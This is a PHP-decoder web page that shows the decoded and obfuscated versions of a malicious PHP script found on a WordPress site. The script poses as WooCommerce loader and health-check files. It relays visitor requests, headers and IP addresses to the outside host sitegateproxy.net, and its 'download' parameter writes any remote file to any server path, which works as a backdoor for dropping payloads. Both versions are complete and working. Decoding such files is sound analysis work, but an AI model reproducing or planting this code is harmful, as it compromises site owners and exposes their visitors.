Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto b404M; zFQAq: function get_from_cache($name) { if (class_exists("\115\x65\155\x63\x6..

Decoded Output download

<?   goto b404M; zFQAq: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto H_MaL; t0Msd: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto cAEex; cAEex: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd
"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto XlHVe; YfPYB: $dest = "sitegateproxy.net"; goto JGq8a; U659z: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto Zpid5; b404M: $routing = array("/wp-content/plugins/woocommerce/vendor/loader.php" => '', "/wp-content/plugins/woocommerce/loader.php" => '', "/wp-includes/health_check.php" => '', "/analytics" => ''); goto YfPYB; H_MaL: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto t0Msd; XlHVe: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto V6pkf; JGq8a: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto U659z; V6pkf: try { if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); } if (isset($_GET["download"])) { download(); die; } $url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; if (!isset($path) || $path == "/") { bad_request(); } $query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); } fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1
\xa"); fputs($fp, "Host: " . $dest . "
"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "Host") !== 0 && strcasecmp($header, "X-Forwarded-For") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . ": " . $value . "
"); } } } fputs($fp, "Connection: close\xd

\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa
", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\xd\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto C75RW; Zpid5: function bad_request() { header("Location: https://google.com"); die; } goto zFQAq; C75RW:  ?>

Did this file decode correctly?

Original Code

 goto b404M; zFQAq: function get_from_cache($name) { if (class_exists("\115\x65\155\x63\x61\x63\x68\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\143\141\x6c\150\157\163\164"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto H_MaL; t0Msd: function remove_in_cache($name) { if (class_exists("\x4d\x65\x6d\143\141\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\157\x63\x61\154\150\157\163\164"); if ($isAvailable) { $memcache->delete($name); } } } goto cAEex; cAEex: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\12"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto XlHVe; YfPYB: $dest = "\x73\x69\164\145\x67\x61\164\x65\x70\x72\157\x78\171\56\x6e\x65\x74"; goto JGq8a; U659z: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\124\124\120\137\130\x5f\x46\117\122\127\x41\x52\104\105\x44\x5f\x46\x4f\122"])) { $ip = $_SERVER["\110\124\x54\120\137\130\x5f\106\117\122\x57\101\x52\104\x45\104\137\x46\117\122"]; } else { if (isset($_SERVER["\110\x54\x54\120\x5f\103\114\x49\105\x4e\x54\x5f\x49\120"])) { $ip = $_SERVER["\x48\124\124\x50\x5f\x43\114\111\105\x4e\124\137\x49\x50"]; } else { $ip = $_SERVER["\122\105\115\x4f\x54\x45\x5f\x41\x44\104\122"]; } } return $ip; } goto Zpid5; b404M: $routing = array("\57\x77\160\x2d\x63\157\156\164\x65\156\164\57\160\154\165\147\151\156\163\57\x77\157\157\143\157\155\x6d\145\162\143\x65\x2f\x76\x65\x6e\x64\x6f\x72\x2f\154\157\141\x64\145\162\56\160\x68\x70" => '', "\x2f\167\160\x2d\x63\x6f\156\x74\x65\x6e\x74\x2f\x70\154\x75\x67\x69\x6e\163\x2f\x77\x6f\x6f\143\157\155\x6d\145\x72\x63\145\x2f\x6c\157\x61\144\145\x72\56\x70\150\x70" => '', "\x2f\167\160\55\x69\156\x63\x6c\165\x64\145\163\57\x68\x65\x61\x6c\x74\150\x5f\143\x68\145\143\153\56\x70\x68\x70" => '', "\x2f\x61\156\141\x6c\x79\164\151\143\163" => ''); goto YfPYB; H_MaL: function set_to_cache($name, $value, $expired) { if (class_exists("\x4d\145\155\x63\x61\143\x68\145")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\157\143\141\154\x68\157\x73\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto t0Msd; XlHVe: function download() { if (isset($_GET["\x73"]) and isset($_GET["\x64"])) { $file_url = urldecode($_GET["\x73"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\x77\53"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\x46\x69\154\x65\x20\x64\157\x77\156\x6c\157\141\144\x65\x64\40\x73\165\x63\x63\145\x73\163\146\165\x6c\x6c\171\x21"; } else { echo "\105\x72\162\157\x72\40\x64\x6f\x77\156\x6c\x6f\x61\144\x69\x6e\147\x20\146\x69\154\x65\41"; } } else { echo dirname(__FILE__); } } goto V6pkf; JGq8a: if (!function_exists("\x61\x70\141\143\x68\x65\x5f\x72\x65\x71\x75\145\163\x74\137\150\x65\x61\144\145\x72\x73")) { function apache_request_headers() { $arh = array(); $rx_http = "\57\134\101\x48\124\124\120\x5f\57"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\137", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\55", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto U659z; V6pkf: try { if ($_SERVER["\122\x45\121\x55\105\x53\x54\x5f\x4d\x45\124\x48\x4f\x44"] !== "\107\105\124") { bad_request(); } if (isset($_GET["\x64\157\167\x6e\154\x6f\141\x64"])) { download(); die; } $url = $_SERVER["\122\105\x51\x55\105\x53\x54\x5f\x55\122\x49"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\141\164\x68"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\161\x75\145\x72\x79"])) { parse_str($url["\x71\165\145\162\x79"], $params); if (isset($params["\x70\x61\x74\x68"])) { $path = $params["\160\141\x74\150"]; unset($params["\160\141\164\x68"]); } if (isset($params["\x63\x61\x63\x68\145"]) && $params["\x63\x61\x63\150\145"] == "\x63\154\145\141\162") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\x2f\150\x74\155\x6c\57\154\x69\166\145\156\x65\163\x73") { echo "\117\113"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\163\x73\x6c\x3a\57\57" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\40\50{$message}\51"); } fputs($fp, "\x47\x45\x54\40" . $path . "\77" . $query . "\x20\110\x54\124\120\x2f\61\56\x31\15\xa"); fputs($fp, "\110\157\x73\164\x3a\40" . $dest . "\15\12"); fputs($fp, "\x58\55\106\x6f\x72\x77\x61\x72\x64\x65\144\x2d\106\157\162\72\40" . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "\x48\157\x73\164") !== 0 && strcasecmp($header, "\130\x2d\x46\x6f\x72\x77\141\162\x64\x65\x64\x2d\x46\157\x72") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . "\x3a\40" . $value . "\15\12"); } } } fputs($fp, "\x43\x6f\156\x6e\145\143\x74\151\157\156\x3a\40\x63\154\157\163\x65\xd\12\15\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\15\12", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\xd\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\103\157\156\x6e\x65\x63\x74\x69\x6f\156") !== false) { continue; } if (strpos($headerLine, "\104\x61\x74\145") !== false) { continue; } if ($headerLine == "\103\157\x6e\164\x65\x6e\x74\x2d\105\156\x63\157\x64\x69\156\x67\x3a\x20\147\172\151\160") { $is_gzip = true; continue; } if ($headerLine == "\124\162\141\x6e\163\x66\145\x72\55\x45\x6e\143\x6f\x64\x69\156\147\x3a\x20\x63\x68\x75\156\x6b\x65\x64") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\103\141\x63\x68\145\55\x43\x6f\x6e\x74\162\x6f\154\x3a\x20\160\x75\x62\154\151\x63\54\x6d\x61\x78\x2d\141\147\145\x3d") !== false) { $cache = intval(str_replace("\103\141\x63\150\x65\55\103\157\156\x74\x72\157\x6c\72\40\160\165\x62\x6c\x69\143\x2c\155\x61\x78\55\x61\x67\145\75", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\x34\60\64\x20\116\157\x74\40\106\x6f\165\x6e\144") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto C75RW; Zpid5: function bad_request() { header("\x4c\157\143\x61\164\x69\x6f\156\x3a\x20\x68\x74\164\x70\163\72\x2f\x2f\x67\157\x6f\x67\154\145\56\x63\x6f\155"); die; } goto zFQAq; C75RW:

Function Calls

None

Variables

None

Stats

MD5	4d137f7b6e2df5b1e22d7897e1430a9c
Eval Count	0
Decode Time	70 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats